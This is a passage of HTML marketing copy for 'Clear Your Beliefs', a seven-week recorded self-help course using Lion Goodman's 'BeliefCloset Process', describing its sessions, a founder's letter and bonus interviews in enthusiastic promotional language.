you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left">The same thing is true in your subconscious mind:</p>\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n<p style="text-align: left"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of 